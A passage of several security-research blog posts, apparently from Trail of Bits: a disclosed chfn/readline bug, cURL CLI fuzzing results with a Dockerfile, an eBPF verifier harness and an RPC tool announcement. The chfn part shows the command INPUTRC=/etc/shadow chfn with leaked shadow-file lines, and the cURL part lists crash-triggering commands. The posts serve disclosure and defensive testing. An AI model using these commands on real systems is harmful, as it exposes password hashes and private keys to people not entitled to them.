If you’re playing along, be warned: logging all getenv calls is insanely noisy and leads to many tedious, repetitive, uninteresting, and repetitive results. After blowing through countless (like, 20) variations of LC_MESSAGES, SYSTEMD_IGNORE_USERDB, SYSTEMD_IGNORE_CHROOT and friends, I came across INPUTRC, which is used somewhere in the chfn command. Intuiting that INPUTRC refers to a configuration file, I blindly passed INPUTRC=/etc/shadow to see what would happen…

$ INPUTRC=/etc/shadow chfn
Changing finger information for user.
Password: 
readline: /etc/shadow: line 9: systemd-journal-remote: unknown key modifier
readline: /etc/shadow: line 10: systemd-network: unknown key modifier
readline: /etc/shadow: line 11: systemd-oom: unknown key modifier
readline: /etc/shadow: line 12: systemd-resolve: unknown key modifier
readline: /etc/shadow: line 13: systemd-timesync: unknown key modifier
readline: /etc/shadow: line 14: systemd-coredump: unknown key modifier
Office [b]: ^C
$

Hmmmmm. /etc/shadow? In my terminal? It’s more likely than you think.

Between the lines: root cause analysis

My first thought was to Google “INPUTRC.” Helpfully, the first result of my search gave me clues that it was related to the readline library. Indeed, by digging through the readline-8.1 source code, I found that “INPUTRC” is passed (via sh_get_env_value) as a parameter to getenv. Looks about right!

int rl_read_init_file (const char *filename) {
  // ...
  if (filename == 0)
    filename = sh_get_env_value ("INPUTRC");     // <- bingo

Searching the readline codebase for the error message “unknown key modifier” that we saw earlier also turns up results. rl_read_init_file calls _rl_read_init_file, which routes to the rl_parse_and_bind function, which emits the error. From this call stack, we can deduce the error occurs when readline attempts to parse the input file—specifically, when it tries to interpret the file contents as a keybind configuration.

Let’s take it from the top. After skipping whitespace, _rl_read_init_file calls rl_parse_and_bind for each non-comment line in the input file. The rl_parse_and_bind function contains four error paths that lead to _rl_init_file_error, which prints the line currently being parsed. This is the root of the bug, as readline is not aware that it’s running with elevated privileges, and assumes it’s safe to print parts of the input file.

_rl_init_file_error is called with the argument string (which is the current line as it loops over the config file) on lines 1557, 1569, 1684, and 1759. Several other error paths can result in partial disclosure of the current line; they are omitted here for brevity. We will also skip looking at what would happen with passing binary files.

By examining the conditions required to reach the paths mentioned above, we can deduce the conditions under which we can leak lines from a file:

  1. We can leak a line that begins with a quotation mark and does not have a closing quotation mark:
    if (*string == '"') {
        i = _rl_skip_to_delim (string, 1, '"');
    
        /* If we didn't find a closing quote, abort the line. */
        if (string[i] == '\0') {
            _rl_init_file_error ("%s: no closing `\"' in key binding", string);
            return 1;
          }
        else
          i++;    /* skip past closing double quote */
      }
    
    $ cat test 
    "AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    Password: 
    readline: test: line 1: "AAAAA: no closing `"' in key binding
    Office [test]: ^C
    $
    
  2. We can leak a line that starts with a colon and contains no whitespace or nulls:
    i = 0;
    // ...
    /* Advance to the colon (:) or whitespace which separates the two objects. */
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    
    if (i == 0) {
        _rl_init_file_error ("`%s': invalid key binding: missing key sequence", string);
        return 1;
      }
    
    $ cat test
    :AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    Password: 
    readline: test: line 1: `:AAAAA: invalid key binding: missing key sequence
    Office [test]: ^C
    $
    
  3. We can leak a line that does not contain a space, a tab, or a colon (or nulls):
    for (; (c = string[i]) && c != ':' && c != ' ' && c != '\t'; i++ );
    // ...
    foundsep = c != 0;
    // ...
    if (foundsep == 0) {
       _rl_init_file_error ("%s: no key sequence terminator", string);
       return 1;
     }
    
    $ cat test
    AAAAA
    $ INPUTRC=test chfn
    Changing finger information for user.
    Password: 
    readline: test: line 1: AAAAA: no key sequence terminator
    Office [test]: ^C
    $ 
    

Happily, SSH keys match this third path, so we can stop here. Well, the juicy bits match, anyway: all the key data is typically Base64-encoded in a PEM container. We can also use this bug to read anything else that's inside a PEM container, such as certificate files, or anything that's simply Base64-encoded, such as WireGuard keys.

Impact

The bug was introduced in version 2.30-rc1 in 2017, which would make it old enough to hit LTS releases. However, Debian, Red Hat, and Ubuntu have chfn provided by a different package, so they are unaffected. In the default configuration on Red Hat, /etc/login.defs doesn't contain CHFN_RESTRICT; this omission would prevent util-linux/chfn from changing any user information, which would also kill the bug. Neither CentOS nor Fedora seems to have chfn installed by default in my testing, either.

Outside of chfn, then, how impactful is this? readline is quite well known, but our interest here is its use in SUID binaries. Running ldd on every SUID binary on my Arch box shows that the library is used only by chfn... How can we quickly determine a wider impact?

I first thought of scanning the package repositories, but unfortunately none of the web interfaces to the Debian, Ubuntu, Fedora, CentOS or Arch package repos provide file modes... This means we don’t have enough information to determine whether any binaries in a given package are SUID.

Sooo I mirrored the Debian and Arch repos for x86_64 and checked them by hand, assisted by some terrible shell scripts. The gist of that endeavor is that Arch is the only distro that has a package (util-linux) that contains a SUID executable (chfn) which loads readline by default. Oh well!

Side note: I totally fumbled reporting the CVE for this, so my name isn’t listed against the CVE with MITRE... RIP my career.

Don’t use readline in SUID applications

This was pretty much the result of an email chain sent to the Arch and Red Hat security teams, and to the package maintainer, who went ahead and removed readline support from chfn. The bug got patched like a year ago, so hopefully most affected users have updated by now.

Homework: go have a look at how many SUIDs use ncurses (atop on macOS, at least) and try messing with the TERMINFO environment variable... Let me know if you find anything :^)

Acknowledgements

Thank you to Karel Zak, and both of the Arch and Red Hat Security teams, who were all very helpful and expedient in rolling out fixes. Thank you also to disconnect3d for help and advice.

Timeline

  • May 2, 2017: Bug introduced
  • December 31, 2020: g l o b a l     t i m e l i n e     r e s e t
  • February 8, 2022: Reported the bug to Arch and util-linux upstream
  • February 14, 2022: Bug fixed in util-linux upstream
  • March 28, 2022: Blog post about the discovery of the bug drafted
  • May 12, 2022: Blog post published internally
  • May 2022-Feb 2023: Procrastination^H Allowing time for updates to roll out
  • February 16, 2023: Blog post published

cURL audit: How a joke led to significant findings

By Maciej Domanski

In fall 2022, Trail of Bits audited cURL, a widely used command-line utility that transfers data to or from a server and supports various protocols. The project coincided with a Trail of Bits maker week, which meant that we had more manpower than we usually do, allowing us to take a nonstandard approach to the audit.

While discussing the threat model of the application, one of our team members jokingly asked, "Have we tried curl AAAAAAAAAA… yet?" Although the comment was made in jest, it sparked an idea: we should fuzz cURL's command-line interface (CLI). Once we did so, the fuzzer quickly uncovered memory corruption bugs, specifically use-after-free issues, double-free issues, and memory leaks. Because the bugs are in libcurl, a cURL development library, they have the potential to affect the many software applications that use libcurl. This blog post describes how we found these vulnerabilities, which are detailed in the results section below.

Working with cURL

cURL is continuously fuzzed by the OSS-Fuzz project, and its harnesses are developed in the separate curl-fuzzer GitHub repository. When I consulted the curl-fuzzer repository to check out the current state of cURL fuzzing, I noticed that cURL’s command-line interface (CLI) arguments are not fuzzed. With that in mind, I decided to focus on testing cURL’s handling of arguments. I used the AFL++ fuzzer (a fork of AFL) to generate a large amount of random input data for cURL’s CLI. I compiled cURL using collision-free instrumentation at link time with AddressSanitizer and then analyzed crashes that could indicate a bug.

cURL obtains its options through command-line arguments. As cURL follows the C89 standard, the main() function of a program can be defined with no parameters or with two parameters (argc and argv). The argc argument represents the number of command-line arguments passed to the program (which includes the program’s name). The argv argument is an array of pointers to the arguments passed to the program from the command line.

The standard also states that in a hosted environment, the main() function takes a third argument, char *envp[]; this argument points to a null-terminated array of pointers to char, each of which points to a string with information about the program’s environment.

The three parameters can have any name, as they are local to the function in which they are declared.

cURL’s main() function in the curl/src/tool_main.c file passes the command-line arguments to the operate() function, which parses them and sets up the global configuration of cURL. cURL then uses that global configuration to execute the operations.

Figure 1.1: cURL’s main() function (curl/src/tool_main.c#236–288)

Fuzzing argv

When I started the process of attempting to fuzz cURL, I looked for a way to use AFL to fuzz its argument parsing. My search led me to a quote from the creator of AFL (Michal Zalewski):

“AFL doesn’t support argv fuzzing because TBH, it’s just not horribly useful in practice. There is an example in experimental/argv_fuzzing/ showing how to do it in a general case if you really want to.”

I looked at that experimental AFL feature and its equivalent in AFL++. The argv fuzzing feature makes it possible to fuzz arguments passed to a program from the CLI, instead of through standard input. That can be useful when you want to cover multiple APIs of a library in fuzz testing, as you can fuzz the arguments of a tool that uses the library rather than writing multiple fuzz tests for each API.

How does the AFL++ argvfuzz feature work?

The argv-fuzz-inl.h header file of argvfuzz defines two macros that take input from the fuzzer and set up argv and argc:

  • The AFL_INIT_ARGV() macro initializes the argv array with the arguments passed to the program from the command line. It then reads the arguments from standard input and puts them in the argv array. The array is terminated by two NULL characters, and any empty parameter is encoded as a lone 0x02 character.
  • The AFL_INIT_SET0(_p) macro is similar to AFL_INIT_ARGV() but also sets the first element of the argv array to the value passed to it. This macro can be useful if you want to preserve the program’s name in the argv array.

Both macros rely on the afl_init_argv() function, which is responsible for reading a command line from standard input (by using the read() function in the unistd.h header file) and splitting it into arguments. The function then stores the resulting array of strings in a static buffer and returns a pointer to that buffer. It also sets the value pointed to by the argc argument to the number of arguments that were read.

To use the argv-fuzz feature, you need to include the argv-fuzz-inl.h header file in the file that contains the main() function and add a call to either AFL_INIT_ARGV or AFL_INIT_SET0 at the beginning of main(), as shown below:

curl/src/tool_main.c
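
In cURL's case, the change amounts to something like the following sketch of the top of main() in src/tool_main.c (the full patch is applied in the Dockerfile at the end of this post):

#include "../../AFLplusplus/utils/argv_fuzzing/argv-fuzz-inl.h"

int main(int argc, char *argv[])
{
  struct GlobalConfig global;
  memset(&global, 0, sizeof(global));

  /* Read argv (and argc) from standard input so AFL++ can mutate the command line */
  AFL_INIT_ARGV();

  /* ... the rest of cURL's main() continues unchanged ... */
}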

Preparing a dictionary

A fuzzing dictionary file specifies the data elements that a fuzzing engine should focus on during testing. The fuzzing engine adjusts its mutation strategies so that it will process the tokens in the dictionary. In the case of cURL fuzzing, a fuzzing dictionary can help afl-fuzz more effectively generate valid test cases that contain options (which start with one or two dashes).

To fuzz cURL, I used the afl-clang-lto compiler’s autodictionary feature, which automatically generates a dictionary during compilation of the target binary. This dictionary is transferred to afl-fuzz on startup, improving its coverage. I also prepared a custom dictionary based on the cURL manpage and passed it to afl-fuzz via the -x parameter. I used the following Bash command to prepare the dictionary:

$ man curl | grep -oP '^\s*(--|-)\K\S+' | sed 's/[,.]$//' | sed 's/^/"&/; s/$/&"/'  | sort -u > curl.dict

Setting up a service for cURL connections

Initially, my focus was solely on CLI fuzzing. Still, I had to consider that each valid cURL command generated by the fuzzer would likely result in a connection to a remote service. To avoid connecting to those services but maintain the ability to test the code responsible for handling connections, I used the netcat tool to simulate a remote service. First, I configured my machine to redirect outgoing traffic to netcat's listening port.

I used the following command to run netcat in the background:

$ netcat -l 80 -k -w 0 &

The parameters indicate that the service should listen for incoming connections on port 80 (-l 80), continue to listen for additional connections after the current one is closed (-k), and immediately terminate the connection once it has been established (-w 0).

cURL is expected to connect to services using various hostnames, IP addresses, and ports. I needed to forward all of these connections to one place: the previously created listener on TCP port 80.

To redirect all outgoing TCP packets to the local loopback address (127.0.0.1) on port 80, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80

The command adds a new entry to the network address translation table in iptables. The -p option specifies the protocol (in this case, TCP), and the -j option specifies the rule’s target (in this case, REDIRECT). The --to-port option specifies the port to which the packets will be redirected (in this case, 80).

To ensure that all domain names would be resolved to IP address 127.0.0.1, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination 127.0.0.1

This rule adds a new entry to the NAT table, specifying the protocol (-p) as UDP, the destination port (--dport) as 53 (the default port for DNS), and the target (-j) as destination NAT. The --to-destination option specifies the address to which the packets will be redirected (in this case, 127.0.0.1).

The abovementioned setup ensures that every cURL connection is directed to the address 127.0.0.1:80.

Results analysis

The fuzzing process ran for a month on a 32-core machine with an Intel Xeon Platinum 8280 CPU @ 2.70GHz. The following bugs were identified during that time, most of them in the first few hours of fuzzing:

CVE-2022-42915 (Double free when using HTTP proxy with specific protocols)

Using cURL with proxy connection and dict, gopher, LDAP, or telnet protocol triggers a double-free vulnerability due to flaws in the error/cleanup handling. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl -x 0:80 dict://0

CVE-2022-43552 (Use after free when HTTP proxy denies tunneling SMB/TELNET protocols)

cURL can virtually tunnel supported protocols through an HTTP proxy. If an HTTP proxy blocks SMB or TELNET protocols, cURL may use a struct that has already been freed in its transfer shutdown code. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -x0:80 telnet:/[j-u][j-u]//0 -m 01
$ curl 0 -x0:80 smb:/[j-u][j-u]//0 -m 01

TOB-CURL-10 (Use after free while using parallel option and sequences)

A use-after-free vulnerability can be triggered by using cURL with the parallel option (-Z), an unmatched bracket, and two consecutive sequences that create 51 hosts. cURL allocates memory blocks for error buffers, allowing up to 50 transfers by default. In the function responsible for handling errors, errors are copied to the appropriate error buffer when connections fail, and the memory is then freed. For the last (51) sequence, a memory buffer is allocated, freed, and an error is copied to the previously freed memory buffer. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl 0 -Z [q-u][u-~] }

TOB-CURL-11 (Unused memory blocks are not freed, resulting in memory leaks)

cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -Z 0 -Tz 0
$ curl 00 --cu 00
$ curl --proto =0 --proto =0

Dockerfile

If you want to learn about the full process of setting up a fuzzing harness and immediately begin fuzzing cURL’s CLI arguments, we have prepared a Dockerfile for you:

# syntax=docker/dockerfile:1
FROM aflplusplus/aflplusplus:4.05c

RUN apt-get update && apt-get install -y libssl-dev netcat iptables groff

# Clone a curl repository
RUN git clone https://github.com/curl/curl.git && cd curl && git checkout 2ca0530a4d4bd1e1ccb9c876e954d8dc9a87da4a

# Apply a patch to use afl++ argv fuzzing feature
COPY <<-EOT /AFLplusplus/curl/curl_argv_fuzz.patch
		diff --git a/src/tool_main.c b/src/tool_main.c
		--- a/src/tool_main.c
		+++ b/src/tool_main.c
		@@ -54,6 +54,7 @@
		 #include "tool_vms.h"
		 #include "tool_main.h"
		 #include "tool_libinfo.h"
		+#include "../../AFLplusplus/utils/argv_fuzzing/argv-fuzz-inl.h"

		 /*
		  * This is low-level hard-hacking memory leak tracking and similar. Using
		@@ -246,6 +247,8 @@ int main(int argc, char *argv[])
		   struct GlobalConfig global;
		   memset(&global, 0, sizeof(global));

		+  AFL_INIT_ARGV();
		+
		 #ifdef WIN32
		   /* Undocumented diagnostic option to list the full paths of all loaded
		      modules. This is purposely pre-init. */
EOT

# Apply a patch to use afl++ argv fuzzing feature
RUN cd curl && git apply curl_argv_fuzz.patch

# Compile a curl using collision-free instrumentation at link time and ASAN
RUN cd curl && \
	autoreconf -i && \
	CC="afl-clang-lto" CFLAGS="-fsanitize=address -g" ./configure --with-openssl --disable-shared && \
	make -j $(nproc) && \
	make install

# Download a dictionary
RUN wget https://gist.githubusercontent.com/ahpaleus/f94eca6b29ca8824cf6e5a160379612b/raw/3de91b2dfc5ddd8b4b2357b0eb7fbcdc257384c4/curl.dict

COPY <<-EOT script.sh
	#!/bin/bash
	# Run a netcat listener on TCP port 80 in the background
	netcat -l 80 -k -w 0 &

	# Prepare iptables entries
	iptables-legacy -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80
	iptables-legacy -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination 127.0.0.1

	# Prepare fuzzing directories
	mkdir fuzz &&
		  cd fuzz &&
		  mkdir in out &&
		  echo -ne 'curl\x00http://127.0.0.1:80' > in/example_command.txt &&
		  # Run afl++ fuzzer
		  afl-fuzz -x /AFLplusplus/curl.dict -i in/ -o out/ -- curl
EOT

RUN chmod +x ./script.sh
ENTRYPOINT ["./script.sh"]

Use the following commands to run this file:

$ docker buildx build -t curl_fuzz .
$ docker run --rm -it --cap-add=NET_ADMIN curl_fuzz

All joking aside

In summary, our approach demonstrates that fuzzing a program's CLI can be an effective supplementary technique for identifying vulnerabilities in software. Despite initial skepticism, our results yielded valuable insights. We believe this approach can improve the security of CLI-based tools, even ones that have been continuously fuzzed through OSS-Fuzz for many years.

We found heap-based memory corruption vulnerabilities in cURL's cleanup process. However, a use-after-free vulnerability may not be exploitable unless the freed data is reused in the right way and its contents are attacker-controlled. A double-free vulnerability would require further allocations of similar size and control over the stored data. Additionally, because the vulnerabilities are in libcurl, they can impact many different software applications that use libcurl in various ways, such as sending multiple requests or setting and cleaning up library resources within a single process.

It is also worth noting that although the attack surface for CLI exploitation is relatively limited, if an affected tool is a SUID binary, exploitation can result in privilege escalation (see CVE-2021-3156: Heap-Based Buffer Overflow in sudo).

To enhance the efficiency of fuzz testing similar tools in the future, we have extended the argv_fuzz feature in AFL++ by incorporating a persistent fuzzing mode. Learn more about it here.

Finally, our cURL audit reports are public. Check the audit report and the threat model.

Harnessing the eBPF Verifier

By Laura Bauman

During my internship at Trail of Bits, I prototyped a harness that improves the testability of the eBPF verifier, simplifying the testing of eBPF programs. My eBPF harness runs in user space, independently of any locally running kernel, and thus opens the door to testing of eBPF programs across different kernel versions.

eBPF enables users to instrument a running system by loading small programs into the operating system kernel. As a safety measure, the kernel “verifies” eBPF programs at load time and rejects any that it deems unsafe. However, using eBPF is a CI/CD nightmare, because there’s no way to know whether a given eBPF program will successfully load and pass verification without testing it on a running kernel.

My harness aims to eliminate that nightmare by executing the eBPF verifier outside of the running kernel. To use the harness, a developer tweaks my libbpf-based sample programs (hello.bpf.c and hello_loader.c) to tailor them to the eBPF program being tested. The version of libbpf provided by my harness links against a “kernel library” that implements the actual bpf syscall, which provides isolation from the running kernel. The harness works well with kernel version 5.18, but it is still a proof of concept; enabling support for other kernel versions and additional eBPF program features will require a significant amount of work.

With great power comes great responsibility

eBPF is an increasingly powerful technology that is used to increase system observability, implement security policies, and perform advanced networking operations. For example, the osquery open-source endpoint agent uses eBPF for security monitoring, to enable organizations to watch process and file events happening across their fleets.

The ability to inject eBPF code into the running kernel seems like either a revelation or a huge risk to the kernel’s security, integrity, and dependability. But how on earth is it safe to load user-provided code into the kernel and execute it there? The answer to this question is twofold. First, eBPF isn’t “normal” code, and it doesn’t execute in the same way as normal code. Second, eBPF code is algorithmically “verified” to be safe to execute.

eBPF isn’t normal code

eBPF (extended Berkeley Packet Filter) is an overloaded term that refers to both a specialized bytecode representation of programs and the in-kernel VM that runs those bytecode programs. eBPF is an extension of classic BPF, which has fewer features than eBPF (e.g., two registers instead of ten), uses an in-kernel interpreter instead of a just-in-time compiler, and focuses only on network packet filtering.

User applications can load eBPF code into kernel space and run it there without modifying the kernel’s source code or loading kernel modules. Loaded eBPF code is checked by the kernel’s eBPF verifier, which tries to prove that the code will terminate without crashing.

The picture above shows the general interaction between user space and kernel space, which occurs through the bpf syscall. The eBPF program is represented in eBPF bytecode, which can be obtained through the Clang back end. The interaction begins when a user space process executes the first in the series of bpf syscalls used to load an eBPF program into the kernel. The kernel then runs the verifier, which enforces constraints that ensure the eBPF program is valid (more on that later). If the verifier approves the program, the verifier will finalize the process of loading it into the kernel, and it will run when it is triggered. The program will then serve as a socket filter, listening on a socket and forwarding only information that passes the filter to user space.

Verifying eBPF

The key to eBPF safety is the eBPF verifier, which limits the set of valid eBPF programs to those that it can guarantee will not harm the kernel or cause other issues. This means that eBPF is, by design, not Turing-complete.

Over time, the set of eBPF programs accepted by the verifier has expanded, though the testability of that set of programs has not. The following quote from the “BPF Design Q&A” section of the Linux kernel documentation is telling:

The [eBPF] verifier is steadily getting ‘smarter.’ The limits are being removed. The only way to know that the program is going to be accepted by the verifier is to try to load it. The BPF development process guarantees that the future kernel versions will accept all BPF programs that were accepted by the earlier versions.

This “development process” relies on a limited set of regression tests that can be run through the kselftest system. These tests require that the version of the source match that of the running kernel and are aimed at kernel developers; the barrier to entry for others seeking to run or modify such tests is high. As eBPF is increasingly relied upon for critical observability and security infrastructure, it is concerning that the Linux kernel eBPF verifier is a single point of failure that is fundamentally difficult to test.

Trust but verify

The main problem facing eBPF is portability—that is, it is notoriously difficult to write an eBPF program that will pass the verifier and work correctly on all kernel versions (or, heck, on even one). The introduction of BPF Compile Once-Run Everywhere (CO-RE) has significantly improved eBPF program portability, though issues still remain. BPF CO-RE relies on the eBPF loader library (libbpf), the Clang compiler, and the eBPF Type Format (BTF) information in the kernel. In short, BPF CO-RE means that an eBPF program can be compiled on one Linux kernel version (e.g., by Clang), modified to match the configuration of another kernel version, and loaded into a kernel of that version (through libbpf) as though the eBPF bytecode had been compiled for it.

However, different kernel versions have different verifier limits and support different eBPF opcodes. This makes it difficult (from an engineering perspective) to tell whether a particular eBPF program will run on a kernel version other than the one it has been tested on. Moreover, different configurations of the same kernel version will also have different verifier behavior, so determining a program’s portability requires testing the program on all desired configurations. This is not practical when building CI infrastructure or trying to ship a production piece of software.

Projects that use eBPF take a variety of approaches to overcoming its portability challenges. For projects that primarily focus on tracing syscalls (like osquery and opensnoop), BPF CO-RE is less necessary, since syscall arguments are stable between kernel versions. In those cases, the limiting factor is the variations in verifier behavior. Osquery chooses to place strict constraints on its eBPF programs; it does not take advantage of modern eBPF verifier support for structures such as bounded loops and instead continues to write eBPF programs that would be accepted by the earliest verifiers. Other projects, such as SysmonForLinux, maintain multiple versions of eBPF programs for different kernel versions and choose a program version dynamically, during compilation.

What is the eBPF verifier?

One of the key benefits of eBPF is the guarantee it provides: that the loaded code will not crash the kernel, will terminate within a time limit, and will not leak information to unprivileged user processes. To ensure that code can be injected into the kernel safely and effectively, the Linux kernel’s eBPF verifier places restrictions on the abilities of eBPF programs. The name of the verifier is slightly misleading, because although it aims to enforce restrictions, it does not perform formal verification.

The verifier performs two main passes over the code. The first pass is handled by the check_cfg() function, which ensures that the program is guaranteed to terminate by performing an iterative depth-first search of all possible execution paths. The second pass (done in the do_check() function) involves static analysis of the bytecode; this pass ensures that all memory accesses are valid, that types are used consistently (e.g., scalar values are never used as pointers), and that the number of branches and total instructions is within certain complexity limits.

As mentioned earlier in the post, the constraints that the verifier enforces have changed over time. For example, eBPF programs were limited to a maximum of 4,096 instructions until kernel version 5.2, which increased that number to 1 million. Kernel version 5.3 introduced the ability for eBPF programs to use bounded loops. Note, though, that the verifier will always be backward compatible in that all future versions of the verifier will accept any eBPF program accepted by older versions of the verifier.

Alarmingly, the ability to load eBPF programs into the kernel is not always restricted to root users or processes with the CAP_SYS_ADMIN capability. In fact, the initial plan for eBPF included support for unprivileged users, requiring the verifier to disallow the sharing of kernel pointers with user programs and to perform constant blinding. In the wake of several privilege escalation vulnerabilities affecting eBPF, most Linux distributions have disabled support for unprivileged users by default. However, overriding the default still creates a risk of crippling privilege escalation attacks.

Regardless of whether eBPF is restricted to privileged users, flaws in the verifier cannot be tolerated if eBPF is to be relied upon for security-critical functionality. As explained in an LWN.net article, at the end of the day, “[the verifier] is 2000 lines or so of moderately complex code that has been reviewed by a relatively small number of (highly capable) people. It is, in a real sense, an implementation of a blacklist of prohibited behaviors; for it to work as advertised, all possible attacks must have been thought of and effectively blocked. That is a relatively high bar.” While the code may have been reviewed by highly capable people, the verifier is still a complex bit of code embedded in the Linux kernel that lacks a cohesive testing framework. Without thorough testing, there is a risk that the backward compatibility principle could be violated or that entire classes of potentially insecure programs could be allowed through the verifier.

Enabling rigorous testing of the eBPF verifier

Given that the eBPF verifier is the foundation of critical infrastructure, it should be analyzed through a rigorous testing process that can be easily integrated into CI workflows. Kernel selftests and example eBPF programs that require a running Linux kernel for every kernel version are inadequate.

The eBPF verifier harness aims to allow testing on various kernel versions without any dependence on the locally running kernel version or configuration. In other words, the harness allows the verifier (the verifier.c file) to run in user space.

Compiling only a portion of the kernel source code for execution in user space is difficult because of the monolithic nature of the kernel and the kernel-specific idioms and functionality. Luckily, the task of eBPF verification is limited in scope, and many of the involved functions and files are consistent across kernel versions. Thus, stubbing out kernel-specific functions for user space alternatives makes it possible to run the verifier in isolation. For instance, because the verifier expects to be called from within a running kernel, it calls kernel-specific memory allocation functions when it is allocating memory. When it is run within the harness, it calls user space memory allocation functions instead.

The harness is not the first tool that aims to improve the verifier’s testability. The IO Visor Project’s BPF fuzzer has a very similar goal of running the verifier in user space and enabling efficient fuzzing—and the tool has found at least one bug. But there is one main difference between the eBPF harness and similar existing solutions: the harness is intended to support all kernel versions, making it easy to compare the same eBPF program across kernel versions. The harness leaves the true kernel functionality as intact as possible to maintain an execution environment that closely approximates a true kernel context.

System design

The harness consists of the following main components:

  • Linux source code (in the form of a Git submodule)
  • A libbpf mirror (also a Git submodule)
  • header_stubs.h (which enables certain kernel functions and macros to be overridden or excluded altogether)
  • Harness source code (i.e., implementations of stubbed-out kernel functions)

The architecture of the eBPF verifier harness.

At a high level, the harness runs a sample eBPF program through the verifier by using standard libbpf conventions in sample.bpf.c and calling bpf_object__load() in sample_loader.c. The libbpf code runs as normal (e.g., probing the “kernel” to see what operations are supported, autocreating maps if configured to do so, etc.), but instead of invoking the actual bpf() syscall and trapping to the running kernel, it executes a harness “syscall” and continues running within the harnessed kernel.

Compiling a portion of the Linux kernel involves making a lot of decisions on which source files should be included and which should be stubbed out. For example, the kernel frequently calls the kmalloc() and kfree() functions for dynamic memory allocation. Because the verifier is running in user space, these functions can be replaced with user space versions like malloc() and free(). Kernel code also includes a lot of synchronization primitives that are not necessary in the harness, since the harness is a single-threaded application; those primitives can also safely be stubbed out.
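
For example, a user space stub for the kernel allocators might look roughly like this (a sketch; the real kernel signatures take gfp_t flags, and more specialized variants exist):

#include <stdlib.h>

/* Illustrative user space replacements for the kernel's allocation primitives */
void *kmalloc(size_t size, unsigned int flags) {
    (void)flags;               /* GFP flags have no meaning in user space */
    return malloc(size);
}

void *kzalloc(size_t size, unsigned int flags) {
    (void)flags;
    return calloc(1, size);
}

void kfree(const void *ptr) {
    free((void *)ptr);
}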

Other kernel functionality is more difficult to efficiently replace. For example, getting the harness to work required finding a way to simulate the Linux kernel Virtual File System. This was necessary because the verifier is responsible for ensuring the safe use of eBPF maps, which are identified by file descriptors. To simulate operations on file descriptors, the harness must also be able to simulate the creation of files associated with the descriptors.

A demonstration

So how does the harness actually work? What do the sample programs look like? Below is a simple eBPF program that contains a bounded loop; verifier support for bounded loops was introduced in kernel version 5.3, so all kernel versions older than 5.3 should reject the program, and all versions newer than 5.3 should accept it. Let’s run it through the harness and see what happens!

bounded_loop.bpf.c:

#include "vmlinux.h"
#include <bpf/bpf_helpers.h>


SEC("tracepoint/syscalls/sys_enter_execve")
int handle_tp(void *ctx)
{
    for (int i = 0; i < 3; i++) {
        bpf_printk("Hello World.\n");
    }
    return 0;
}

char LICENSE[] SEC("license") = "Dual BSD/GPL";

Using the harness requires compiling each eBPF program into eBPF bytecode; once that’s done, a “loader” program calls the libbpf functions that handle the setup of the bpf syscalls. The loader program looks something like the program shown below, but it can be tweaked to allow for different configuration and setup options (e.g., to disable the autocreation of maps).

bounded_loop_loader.c:

#include <stdio.h>
#include <stdarg.h>
#include "bounded_loop.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) {
    return vfprintf(stderr, format, args);
}

int load() {
  struct bounded_loop_bpf *obj;
  const struct bpf_insn *insns;
  int err = 0;

  libbpf_set_print(libbpf_print_fn);

  obj = bounded_loop_bpf__open();
  if (!obj) {
    fprintf(stderr, "failed to open BPF object. \n");
    return 1;
  }

  // this function invokes the verifier
  err = bpf_object__load(*obj->skeleton->obj);

  // free memory allocated by libbpf functions
  bounded_loop_bpf__destroy(obj);
  return err;
}

Compiling the sample program with the necessary portions of Linux source code, libbpf, and the harness runtime produces an executable that will run the verifier and report whether the program passes verification.

The output of bounded_loop.bpf.c when run through version 5.18 of the verifier.

Looking forward

The harness is still a proof of concept, and several aspects of it will need to be improved before it can be used in production. For instance, to fully support all eBPF map types, the harness will need the ability to fully stub out additional kernel-level memory allocation primitives. The harness will also need to reliably support all versions of the verifier between 3.15 and the latest version. Implementing that support will involve manually accounting for differences in the internal kernel application programming interfaces (APIs) between these versions and adjusting stubbed-out subsystems as necessary. Lastly, a more cohesive organization of the stubbed-out functions, along with thorough documentation of that organization, would make it much easier to distinguish between unmodified kernel code and functions that have been stubbed out with user space alternatives.

Because these issues will take a nontrivial amount of work, we invite the larger community to build upon the work we have released. While we have many ideas for improvements that will move the eBPF verifier harness closer to adoption, we believe there are others out there who could enhance this work with their own expertise. Although that initial work will enable rapid testing of all kernel versions once it’s complete, the harness will still need to be updated each time a new kernel version is released to account for any internal changes.

However, the eBPF verifier is critical and complex infrastructure, and complexity is the enemy of security; when it is difficult to test complex code, it is difficult to feel confident in the security of that code. Thus, extracting the verifier into a testing harness is well worth the effort—though the amount of effort it requires should serve as a general reminder of the importance of testability.

Introducing RPC Investigator

A new tool for Windows RPC research

By Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing, and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the renowned attack surface its implementations afford to exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there’s always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on GitHub.

Background

Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

